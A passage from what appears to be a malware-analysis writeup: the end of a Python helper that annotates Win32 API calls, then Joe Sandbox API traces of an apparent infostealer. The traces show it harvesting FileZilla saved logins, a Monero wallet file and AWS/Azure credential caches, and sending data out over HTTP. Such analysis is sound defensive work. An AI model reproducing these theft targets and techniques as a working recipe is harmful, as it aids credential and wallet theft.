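        return f"{c.ref:08X}: LocalAlloc uFlags=0x{a[0]:X} ({LMEM.get(a[0], 'unknown flags')})"
    if c.api == "CryptUnprotectData" and len(a) > 5:
        entropy, prompt, flags = a[2], a[4], a[5]   # pOptionalEntropy, pPromptStruct, dwFlags
        if entropy == 0 and prompt == 0 and flags == 0:
            return (f"{c.ref:08X}: CryptUnprotectData with no entropy, no prompt, dwFlags=0: "
                    "plain DPAPI unseal under the calling user's logon session")
        return f"{c.ref:08X}: CryptUnprotectData entropy={entropy} prompt={prompt} flags={flags}"
    return None


def size_then_fill(calls: list) -> list:
    """Win32 idiom: API (size query) -> allocator -> the same API again to fill the buffer."""
    hits = []
    for first, alloc, second in zip(calls, calls[1:], calls[2:]):
        if first.api == second.api and alloc.api in ALLOCATORS:
            hits.append(f"size-then-fill idiom: {first.api} at {first.ref:08X} sizes, "
                        f"{alloc.api} at {alloc.ref:08X} allocates, {first.api} at {second.ref:08X} fills")
    return hits


def analyze(text: str) -> list:
    """Notes for one function entry's APIs block: per-call notes in call order, idioms last."""
    calls = parse_api_lines(text)
    notes = [n for n in (describe(c) for c in calls) if n]
    return notes + size_then_fill(calls)


if __name__ == "__main__":
    for name, frag in (("base64 decode", FRAGMENT_BASE64), ("DPAPI unseal", FRAGMENT_DPAPI)):
        print(f"[{name}]")
        for note in analyze(frag):
            print("  " + note)
```

Run it per function entry, not over a concatenation of entries, since size_then_fill looks at adjacent calls and a LocalAlloc that happens to sit between the same API in two different functions would otherwise produce a false hit. The notes it prints for the two fragments are the ones stated in the lead-in: CRYPT_STRING_BASE64 decode into an LPTR buffer with the size-then-fill idiom, and a no-entropy, no-prompt DPAPI unseal.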
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Bt_$m5
                                • API String ID: 0-2187979626
                                • Opcode ID: 4753ac9454adad583c937fa39ae33a7d52392934da18fd3c4234fbd91ff1c6e7
                                • Instruction ID: b121421828170cb4dc00e4952ee9151947eb8d9a4db3d24d55b0cdf8d0c8fa62
                                • Opcode Fuzzy Hash: 4753ac9454adad583c937fa39ae33a7d52392934da18fd3c4234fbd91ff1c6e7
                                • Instruction Fuzzy Hash: 7102D6F3A0C2149FE314AF2DDC8567AF7E9EB98720F16452DEAC8C3340EA3558158796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: RV-v${]
                                • API String ID: 0-222116142
                                • Opcode ID: 40bec07204ed0f2601c53aac7e3b93c9823ff5f14c9702f9e00f2c656e090383
                                • Instruction ID: c2aba1b7fbf15d6ecc53d57f53196131bf4c15f7aa77e48cc51dfdaf6deef8c2
                                • Opcode Fuzzy Hash: 40bec07204ed0f2601c53aac7e3b93c9823ff5f14c9702f9e00f2c656e090383
                                • Instruction Fuzzy Hash: 97511CF3F086049BF304AE29DC5576AB7D6DBD4720F2B853DDAC8C3384E93958068296
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 83]2
                                • API String ID: 0-4113835522
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00DA0DBA,00DA0DB7,00DA0DB6,00DA0DB3), ref: 00D90362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D90369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D90385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D903CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D903DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00D90419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D90463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D9051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D90532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D9054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D90562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00D90571
                                • lstrcat.KERNEL32(?,url: ), ref: 00D90580
                                • lstrcat.KERNEL32(?,00000000), ref: 00D90593
                                • lstrcat.KERNEL32(?,00DA1678), ref: 00D905A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00D905B5
                                • lstrcat.KERNEL32(?,00DA167C), ref: 00D905C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00D905D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00D905E6
                                • lstrcat.KERNEL32(?,00DA1688), ref: 00D905F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00D90604
                                • lstrcat.KERNEL32(?,00000000), ref: 00D90617
                                • lstrcat.KERNEL32(?,00DA1698), ref: 00D90626
                                • lstrcat.KERNEL32(?,00DA169C), ref: 00D90635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DA0DB2), ref: 00D9068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D859F8
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D85A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D85B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0182EA98,00000000,?,0182A7E0,00000000,?,00DA1A1C), ref: 00D85E71
                                • lstrlen.KERNEL32(00000000), ref: 00D85E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00D85E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D85E9A
                                • lstrlen.KERNEL32(00000000), ref: 00D85EAF
                                • lstrlen.KERNEL32(00000000), ref: 00D85ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D85EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00D85F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D85F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D85F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00D85FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00D85FBD
                                • HttpOpenRequestA.WININET(00000000,0182EB78,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D85BF8
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • InternetCloseHandle.WININET(00000000), ref: 00D85FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                 • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: b3f232ad08535cd1838662858359b40f4a30dade073f316f78f8a1d32a94833b
                                • Instruction ID: e9111395e261f7fcdd071462ba11c11b20694841119cc4c57a6e2b13a6fc6310
                                • Opcode Fuzzy Hash: b3f232ad08535cd1838662858359b40f4a30dade073f316f78f8a1d32a94833b
                                • Instruction Fuzzy Hash: B312AD72920128ABDF15EBA4DD96FEEB378FF14700F504199B10A62091EF706A49CFB5
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D8D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D8D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D208
                                • lstrcat.KERNEL32(?,00DA1478), ref: 00D8D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D22A
                                • lstrcat.KERNEL32(?,00DA147C), ref: 00D8D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D24C
                                • lstrcat.KERNEL32(?,00DA1480), ref: 00D8D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D26E
                                • lstrcat.KERNEL32(?,00DA1484), ref: 00D8D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D290
                                • lstrcat.KERNEL32(?,00DA1488), ref: 00D8D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D2B2
                                • lstrcat.KERNEL32(?,00DA148C), ref: 00D8D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8D2D4
                                • lstrcat.KERNEL32(?,00DA1490), ref: 00D8D2E3
                                  • Part of subcall function 00D9A820: lstrlen.KERNEL32(00D84F05,?,?,00D84F05,00DA0DDE), ref: 00D9A82B
                                  • Part of subcall function 00D9A820: lstrcpy.KERNEL32(00DA0DDE,00000000), ref: 00D9A885
                                • lstrlen.KERNEL32(?), ref: 00D8D32A
                                • lstrlen.KERNEL32(?), ref: 00D8D339
                                  • Part of subcall function 00D9AA70: StrCmpCA.SHLWAPI(01828F98,00D8A7A7,?,00D8A7A7,01828F98), ref: 00D9AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8D3B4
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 6801593242737500f8a93fc1a603fe38b8a2469411dd32ba72bf2308c665e6d7
                                • Instruction ID: 097c5306ed664a093304f7885c60a566881c395115264b616f28b4437aa64b3a
                                • Opcode Fuzzy Hash: 6801593242737500f8a93fc1a603fe38b8a2469411dd32ba72bf2308c665e6d7
                                • Instruction Fuzzy Hash: 13E1F972910118ABCF04EBA8DE96EEE7379FF14305F104158F106A7091DE35BA09DBB6
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0182CE10,00000000,?,00DA144C,00000000,?,?), ref: 00D8CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D8CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00D8CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D8CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D8CAD9
                                • StrStrA.SHLWAPI(?,0182CFC0,00DA0B52), ref: 00D8CAF7
                                • StrStrA.SHLWAPI(00000000,0182CE28), ref: 00D8CB1E
                                • StrStrA.SHLWAPI(?,0182D8C0,00000000,?,00DA1458,00000000,?,00000000,00000000,?,01829088,00000000,?,00DA1454,00000000,?), ref: 00D8CCA2
                                • StrStrA.SHLWAPI(00000000,0182D9E0), ref: 00D8CCB9
                                  • Part of subcall function 00D8C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D8C871
                                  • Part of subcall function 00D8C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D8C87C
                                • StrStrA.SHLWAPI(?,0182D9E0,00000000,?,00DA145C,00000000,?,00000000,01829048), ref: 00D8CD5A
                                • StrStrA.SHLWAPI(00000000,01829138), ref: 00D8CD71
                                  • Part of subcall function 00D8C820: lstrcat.KERNEL32(?,00DA0B46), ref: 00D8C943
                                  • Part of subcall function 00D8C820: lstrcat.KERNEL32(?,00DA0B47), ref: 00D8C957
                                  • Part of subcall function 00D8C820: lstrcat.KERNEL32(?,00DA0B4E), ref: 00D8C978
                                • lstrlen.KERNEL32(00000000), ref: 00D8CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00D8CE9C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 9bf20a94f85d19f025ac2c08e29a0304cf835d5c6cd6e5bcb54fd8cf4957c86e
                                • Instruction ID: 416d7bd0d8a7c8a333e98a17b7dd5d6bb39f601ef2aac690453a8a517e28becb
                                • Opcode Fuzzy Hash: 9bf20a94f85d19f025ac2c08e29a0304cf835d5c6cd6e5bcb54fd8cf4957c86e
                                • Instruction Fuzzy Hash: A4E1C572910118ABDF15EBA8DD96FEEB778EF14304F404159F106A7191EE306A4ACBB2
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • RegOpenKeyExA.ADVAPI32(00000000,0182B048,00000000,00020019,00000000,00DA05B6), ref: 00D983A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D98426
                                • wsprintfA.USER32 ref: 00D98459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D9847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D9848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D98499
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: a0cd37d91b5dfef83d9661ddee4ed8418ae9afd91a98dadf05a298b7d2f28391
                                • Instruction ID: 26584d4413597daf4b422ab509d65438b99d2cae5eb992151d06b875013577cc
                                • Opcode Fuzzy Hash: a0cd37d91b5dfef83d9661ddee4ed8418ae9afd91a98dadf05a298b7d2f28391
                                • Instruction Fuzzy Hash: 9F81EA7291012CABDB24DB54CD95FEAB7B8FF08704F008699E109A6180DF756A85DFF1
                                APIs
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00D94DCD
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D9492C
                                  • Part of subcall function 00D94910: FindFirstFileA.KERNEL32(?,?), ref: 00D94943
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00D94E59
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FDC), ref: 00D94971
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA0FE0), ref: 00D94987
                                  • Part of subcall function 00D94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D94B7D
                                  • Part of subcall function 00D94910: FindClose.KERNEL32(000000FF), ref: 00D94B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D94EE5
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D949B0
                                  • Part of subcall function 00D94910: StrCmpCA.SHLWAPI(?,00DA08D2), ref: 00D949C5
                                  • Part of subcall function 00D94910: wsprintfA.USER32 ref: 00D949E2
                                  • Part of subcall function 00D94910: PathMatchSpecA.SHLWAPI(?,?), ref: 00D94A1E
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,0182EAB8), ref: 00D94A4A
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,00DA0FF8), ref: 00D94A5C
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,?), ref: 00D94A70
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,00DA0FFC), ref: 00D94A82
                                  • Part of subcall function 00D94910: lstrcat.KERNEL32(?,?), ref: 00D94A96
                                  • Part of subcall function 00D94910: CopyFileA.KERNEL32(?,?,00000001), ref: 00D94AAC
                                  • Part of subcall function 00D94910: DeleteFileA.KERNEL32(?), ref: 00D94B31
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: ee1832e5b8a9c8d117f9cb1fc123244812e31f242010d35a79f5abf9c2602c65
                                • Instruction ID: 7923ac68d34ef1b1ee998452b461c374ae07e00d91d63f7f697310f06cde0201
                                • Opcode Fuzzy Hash: ee1832e5b8a9c8d117f9cb1fc123244812e31f242010d35a79f5abf9c2602c65
